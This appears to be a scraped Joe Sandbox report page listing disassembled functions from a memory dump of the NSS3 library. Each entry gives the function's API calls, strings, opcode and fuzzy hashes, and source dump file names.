API ID: Util$Arena_$ArenaFree$ErrorValue$Alloc_AllocateCriticalDecodeEnterInitItem_LockPoolSectionUnlockcalloc
String ID:
API String ID: 2561846027-0
Opcode ID: fdd4a9d571d7059363cf4c8a947666c4b3c3bb874ba7016129b2fcf8a747aef4
Instruction ID: 3cffb89c8053ee24f753426c44dd2c488b0dbe4bbbd7c1fa00bcad9ed3c3a50b
Opcode Fuzzy Hash: fdd4a9d571d7059363cf4c8a947666c4b3c3bb874ba7016129b2fcf8a747aef4
Instruction Fuzzy Hash: F4112772901255B7FF004E615C81FEB3A58AF9539CF050260FD18596D1E761CCA58BA1

Function 6C5D3C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C5D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5D5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5D3D3F

Part of subcall function 6C54BA90: PORT_NewArena_Util.NSS3(00000800,6C5D3CAF,?), ref: 6C54BABF
Part of subcall function 6C54BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C5D3CAF,?), ref: 6C54BAD5
Part of subcall function 6C54BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C5D3CAF,?), ref: 6C54BB08
Part of subcall function 6C54BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C5D3CAF,?), ref: 6C54BB1A
Part of subcall function 6C54BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C5D3CAF,?), ref: 6C54BB3B

PR_EnterMonitor.NSS3(?), ref: 6C5D3CCB

Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090AB
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090C9
Part of subcall function 6C609090: EnterCriticalSection.KERNEL32 ref: 6C6090E5
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C609116
Part of subcall function 6C609090: LeaveCriticalSection.KERNEL32 ref: 6C60913F

PR_EnterMonitor.NSS3(?), ref: 6C5D3CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5D3CF8
PR_ExitMonitor.NSS3(?), ref: 6C5D3D15
PR_ExitMonitor.NSS3(?), ref: 6C5D3D2E

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: b08bc55d2b2095f75f41da4e595dd3500f7ee34cee5df3fe309e43ae6a620041
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: 16110BB56107005FE7206E6DFC4179B72F5EF5124CF514534E41A9BB20F632F819CA5A

Function 6C59FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C59FE08

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C59FE1D

Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C59FE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C59FE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C59FE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6C59FE6F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 691cc5956705d26d3038284e4001e20c5232021bbbcce31d6e72e67707a12738
Instruction ID: 43eaa9f34bbc042f34ec153464d4d8a6abf02afb7edb5ef8120cdbbd7ea71161
Opcode Fuzzy Hash: 691cc5956705d26d3038284e4001e20c5232021bbbcce31d6e72e67707a12738
Instruction Fuzzy Hash: 031108B6600245ABEB008F56DC40A5F73D8AF94399F248274F91D87B12E731D924C791

Function 6C64FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6C64FD9E

Part of subcall function 6C609BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C531A48), ref: 6C609BB3
Part of subcall function 6C609BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C531A48), ref: 6C609BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6C64FDB9

Part of subcall function 6C52A900: TlsGetValue.KERNEL32(00000000,?,6C6A14E4,?,6C4C4DD9), ref: 6C52A90F
Part of subcall function 6C52A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C52A94F

PR_Unlock.NSS3 ref: 6C64FDD4
PR_Lock.NSS3 ref: 6C64FDF2
PR_NotifyAllCondVar.NSS3 ref: 6C64FE0D
PR_Unlock.NSS3 ref: 6C64FE23

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: 10aa695a16bb43a3f1131ca216a3c005f8f6b80a9c742af0308f1ae417d27a87
Instruction ID: 33295ed8af2e96e0d7163ee19977000c618857e2357ccc5b8506a5f0eea2b42d
Opcode Fuzzy Hash: 10aa695a16bb43a3f1131ca216a3c005f8f6b80a9c742af0308f1ae417d27a87
Instruction Fuzzy Hash: CA0152BAA04141AFDF049F5AFD408957A71EF42268B158374E825477E1E722ED28C6CA

Function 6C5D6840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6C5DAA9B,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D6846

Part of subcall function 6C531770: calloc.MOZGLUE(00000001,0000019C,?,6C5315C2,?,?,?,?,?,00000001,00000040), ref: 6C53178D

PR_NewMonitor.NSS3(00000000,?,6C5DAA9B,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D6855

Part of subcall function 6C598680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C5455D0,00000000,00000000), ref: 6C59868B
Part of subcall function 6C598680: PR_NewLock.NSS3(00000000,00000000), ref: 6C5986A0
Part of subcall function 6C598680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C5986B2
Part of subcall function 6C598680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C5986C8
Part of subcall function 6C598680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C5986E2
Part of subcall function 6C598680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C5986EC
Part of subcall function 6C598680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C598700

PR_NewMonitor.NSS3(?,6C5DAA9B,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D687D

Part of subcall function 6C531770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C5318DE
Part of subcall function 6C531770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C5318F1

PR_NewMonitor.NSS3(?,6C5DAA9B,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D688C

Part of subcall function 6C531770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C5318FC
Part of subcall function 6C531770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C53198A

PR_NewLock.NSS3 ref: 6C5D68A5

Part of subcall function 6C6098D0: calloc.MOZGLUE(00000001,00000084,6C530936,00000001,?,6C53102C), ref: 6C6098E5

PR_NewLock.NSS3 ref: 6C5D68B4

Part of subcall function 6C6098D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C609946
Part of subcall function 6C6098D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4C16B7,00000000), ref: 6C60994E
Part of subcall function 6C6098D0: free.MOZGLUE(00000000), ref: 6C60995E

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: 96cfda88d8232f47bb17d97d820cc771fe9bf9dc1dfbe9ba57ed05591b534889
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: 5401FBB0A01B1786E7516B794C243E777E59F4128DF16083A8469CAB40FF61E8498BA9

Function 6C52AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52AFDA

Strings

%s at line %d of [%.10s], xrefs: 6C52AFD3
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52AFC4
misuse, xrefs: 6C52AFCE
unable to delete/modify collation sequence due to active statements, xrefs: 6C52AF5C

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 431642ebff597ea28c8966c07ea92c4d1d564d4fcd5ccbe122a1ed909ae31a2a
Instruction ID: 597f34011b0ececfbc56bc0c627058135a10e6aee4250bb83103260f11ae1616
Opcode Fuzzy Hash: 431642ebff597ea28c8966c07ea92c4d1d564d4fcd5ccbe122a1ed909ae31a2a
Instruction Fuzzy Hash: 3291E075A002558FDB14CF69CC90AAAB7F1BF45314F1985A8E865AB791D738EC02CBA0

Function 6C58FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C58FC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C58FCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C58FDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C58FDDE

Part of subcall function 6C598800: TlsGetValue.KERNEL32(?,6C5A085A,00000000,?,6C548369,?), ref: 6C598821
Part of subcall function 6C598800: TlsGetValue.KERNEL32(?,?,6C5A085A,00000000,?,6C548369,?), ref: 6C59883D
Part of subcall function 6C598800: EnterCriticalSection.KERNEL32(?,?,?,6C5A085A,00000000,?,6C548369,?), ref: 6C598856
Part of subcall function 6C598800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C598887
Part of subcall function 6C598800: PR_Unlock.NSS3(?,?,?,?,6C5A085A,00000000,?,6C548369,?), ref: 6C598899

Strings

pkcs11:, xrefs: 6C58FC4F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: e45178cee5659ee43968b9a1deabab633905cdafb0576fe18de2a6dbf36567d5
Instruction ID: 50e99a0f3b4d7115803f4232126a043fb90ba39eb9703c8807bfaa50842ffc3f
Opcode Fuzzy Hash: e45178cee5659ee43968b9a1deabab633905cdafb0576fe18de2a6dbf36567d5
Instruction Fuzzy Hash: D751E5B1A07171DFEB009F65DC81BAA3765EF89358F140665DE089BB52E730E904CBA2

Function 6C4CBDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6C4CBE02

Part of subcall function 6C5F9C40: memcmp.VCRUNTIME140(?,00000000,6C4CC52B), ref: 6C5F9D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4CBE9F

Strings

%s at line %d of [%.10s], xrefs: 6C4CBE98
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4CBE89
database corruption, xrefs: 6C4CBE93

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: 89b74f20a15832adf3594d71b150337d2359ab160507fac78d728e47f2451c63
Instruction ID: 896420ec54f4ffd996833702e5bc386edfefa43eca6c099bc801a740dbe0e428
Opcode Fuzzy Hash: 89b74f20a15832adf3594d71b150337d2359ab160507fac78d728e47f2451c63
Instruction Fuzzy Hash: 0E315739B042598BC700CF69C8D4EBBBBA1AF41B15B088544EE541BB61D331EC05C7E3

Function 6C5B6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C5B6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B6E57

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C5B6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C5B6EAA

Strings

nel, xrefs: 6C5B6DF9

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nel
API String ID: 3163584228-4255194777
Opcode ID: 59d18495685a4072f03cb87863c4fe055362a2cbf289c032fc2ee2d0cb4f54bf
Instruction ID: 35c0d1e06aacf4384aed3d73ceaf0298be22122327531cb7986102d84874bda6
Opcode Fuzzy Hash: 59d18495685a4072f03cb87863c4fe055362a2cbf289c032fc2ee2d0cb4f54bf
Instruction Fuzzy Hash: 4431B132610712EEDB1C5E34DD24397BBA5AB0531AF14063CE499F6B80EF307858CB81

Function 6C541EC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C544C64,?,-00000004), ref: 6C541EE2

Part of subcall function 6C5A1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C541D97,?,?), ref: 6C5A1836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C544C64,?,-00000004), ref: 6C541F13
DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C544C64,?,-00000004), ref: 6C541F37
DER_DecodeTimeChoice_Util.NSS3(?,dLTl,?,?,?,?,?,?,?,?,00000000,00000000,?,6C544C64,?,-00000004), ref: 6C541F53

Strings

dLTl, xrefs: 6C541F2B, 6C541F51

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID: dLTl
API String ID: 3216063065-1985183439
Opcode ID: 7b0ac71c6deee78eed8b6aed0018a6e478a622375ad15cba82af21ae7b74497b
Instruction ID: 72105432ab552cf53bb18790e999905e98eb12052060f4fc5dc58e7f0315c9e6
Opcode Fuzzy Hash: 7b0ac71c6deee78eed8b6aed0018a6e478a622375ad15cba82af21ae7b74497b
Instruction Fuzzy Hash: F221A775504306FFC700CF66DD00A9B77E9AB85759F004929E954C3A40F330E529C7E2

Function 6C530DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C530BDE), ref: 6C530DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C530BDE), ref: 6C530DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C530BDE), ref: 6C530DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C530BDE), ref: 6C530E32

Strings

%s incr => %d (find lib), xrefs: 6C530E2D

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: a2f3f36c6eefbd3e6e12e68d7d2c020cd77899b0e327b1fe30b8117d5f1f0c77
Instruction ID: e2e9e63b59c9136a3f4fe74014388939859e1a0b49b9337b26596100063887a0
Opcode Fuzzy Hash: a2f3f36c6eefbd3e6e12e68d7d2c020cd77899b0e327b1fe30b8117d5f1f0c77
Instruction Fuzzy Hash: 22012872B003209FE7108F26DC85E1773ACDB85609B15486ED909D7681F762FC1487E5

Function 6C5EAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]]l,00000000,?,?,6C5C6AC6,?), ref: 6C5EAC2D

Part of subcall function 6C58ADC0: TlsGetValue.KERNEL32(?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AE10
Part of subcall function 6C58ADC0: EnterCriticalSection.KERNEL32(?,?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AE24
Part of subcall function 6C58ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C56D079,00000000,00000001), ref: 6C58AE5A
Part of subcall function 6C58ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AE6F
Part of subcall function 6C58ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AE7F
Part of subcall function 6C58ADC0: TlsGetValue.KERNEL32(?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AEB1
Part of subcall function 6C58ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C56CDBB,?,6C56D079,00000000,00000001), ref: 6C58AEC9

PK11_FreeSymKey.NSS3(?,@]]l,00000000,?,?,6C5C6AC6,?), ref: 6C5EAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]]l,00000000,?,?,6C5C6AC6,?), ref: 6C5EAC59
free.MOZGLUE(8CB6FF01,6C5C6AC6,?,?,?,?,?,?,?,?,?,?,6C5D5D40,00000000,?,6C5DAAD4), ref: 6C5EAC62

Strings

@]]l, xrefs: 6C5EAC05

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]]l
API String ID: 1595327144-2502243496
